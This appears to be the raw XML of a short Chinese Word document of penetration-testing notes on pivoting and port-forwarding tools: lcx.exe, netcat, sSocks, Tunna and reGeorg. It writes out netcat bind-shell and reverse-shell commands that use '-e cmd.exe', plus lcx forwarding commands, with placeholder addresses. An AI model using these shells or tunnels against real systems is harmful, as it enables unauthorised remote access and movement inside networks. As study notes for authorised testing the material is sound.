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09" w:rsidRDefault="00724509" w:rsidP="00724509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724509">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>内网渗透中转发工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847498" w:rsidRDefault="00DB3BE6" w:rsidP="00724509">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>监听；转发；端口转向</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3BE6" w:rsidRDefault="00847498" w:rsidP="00724509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847498">
        <w:t>http://static.hx99.net/static/drops/tools-15000.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00724509" w:rsidRDefault="00DB3BE6" w:rsidP="00DB3BE6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0x00 lcx.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3BE6" w:rsidRDefault="00167282" w:rsidP="00DB3BE6">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidR="00D27E82">
        <w:t>转发</w:t>
      </w:r>
      <w:r w:rsidR="00D27E82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">lcx.exe –slave </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>公网</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 端口 内网</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D27E82" w:rsidRDefault="00D27E82" w:rsidP="00DB3BE6">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>监听</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">lcx.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>listen  内网监听的端口  转发的外网端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2121" w:rsidRDefault="005C2121" w:rsidP="00DB3BE6">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C2121" w:rsidRDefault="005C2121" w:rsidP="00DB3BE6">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">0x01 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C4EAA">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>(正向连接，方向连接)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4EAA" w:rsidRDefault="009C4EAA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</w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[options] </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-d        </w:t>
      </w:r>
      <w:r>
        <w:t>后台模式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:t>程序重定向，一旦连接，就执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:t>危险</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">!!] </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-l        </w:t>
      </w:r>
      <w:r>
        <w:t>监听模式，用于入站连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-L        </w:t>
      </w:r>
      <w:r>
        <w:t>连接关闭后</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>仍然继续监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-n        </w:t>
      </w:r>
      <w:r>
        <w:t>直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址，而不通过域名服务器。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-p &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;    </w:t>
      </w:r>
      <w:r>
        <w:t>设置本地主机使用的通信端口。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-s &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>源</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;    </w:t>
      </w:r>
      <w:r>
        <w:t>设置本地主机送出数据包的</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>地址。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-t        </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>TELNET</w:t>
      </w:r>
      <w:r>
        <w:t>交互方式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-u        </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:t>传输协议。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-v        </w:t>
      </w:r>
      <w:r>
        <w:t>详细输出（用两个</w:t>
      </w:r>
      <w:r>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t>可得到更详细的内容）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-w &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>超时秒数</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;    </w:t>
      </w:r>
      <w:r>
        <w:t>设置等待连线的时间</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>即指定多少秒后，断开。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-z        </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>输出模式，只在扫描通信端口时使用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E1D" w:rsidRPr="00A76E1D" w:rsidRDefault="00A76E1D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  <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>正向连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34A9A" w:rsidRPr="00A76E1D" w:rsidRDefault="00C34A9A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  <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程主机：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  -l</w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidR="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>监听的</w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00244F7A" w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00244F7A" w:rsidRDefault="00244F7A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  <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地主机：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidR="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76E1D" w:rsidRDefault="00A76E1D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  <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A76E1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>反向连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B16EC" w:rsidRPr="000B4AC0" w:rsidRDefault="000B16EC" w:rsidP="000B16EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地主机：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  -l </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>监听的端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00244F7A" w:rsidRPr="000B4AC0" w:rsidRDefault="000B16EC" w:rsidP="000B4AC0">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="微软雅黑" w:hAnsi="Tahoma" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>远程主机：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  -e cmd.exe  </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>本地主机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>监听的端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4AC0" w:rsidRDefault="000B4AC0" w:rsidP="000B4AC0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0x0</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D27E82" w:rsidRDefault="000B4AC0" w:rsidP="00DB3BE6">
      <w:pPr>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://sourceforge.net/projects/ssocks/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://sourceforge.net/projects/ssocks/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4AC0" w:rsidRDefault="000B4AC0" w:rsidP="000B4AC0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>0x0</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tunna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 正向代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00310BC9" w:rsidRPr="00310BC9" w:rsidRDefault="00310BC9" w:rsidP="000B4AC0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00310BC9">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>http://static.hx99.net/static/drops/tools-650.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4AC0" w:rsidRDefault="000B4AC0" w:rsidP="000B4AC0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0x0</w:t>
      </w:r>
      <w:r w:rsidR="00DC2FC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reGeorg+proxifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 正向代理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B4AC0" w:rsidRPr="00724509" w:rsidRDefault="000B4AC0" w:rsidP="00DB3BE6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</w:p>
    <w:p w:rsidR="004358AB" w:rsidRDefault="004358AB" w:rsidP="00724509">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="center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16EC"/>
    <w:rsid w:val="000B4AC0"/>
    <w:rsid w:val="00167282"/>
    <w:rsid w:val="00244F7A"/>
    <w:rsid w:val="00310BC9"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="005C2121"/>
    <w:rsid w:val="005D3D5C"/>
    <w:rsid w:val="00724509"/>
    <w:rsid w:val="00847498"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="009C4EAA"/>
    <w:rsid w:val="00A76E1D"/>
    <w:rsid w:val="00C34A9A"/>
    <w:rsid w:val="00D27E82"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00DB3BE6"/>
    <w:rsid w:val="00DC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2450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509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6728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B4A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2017-07-10T09:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>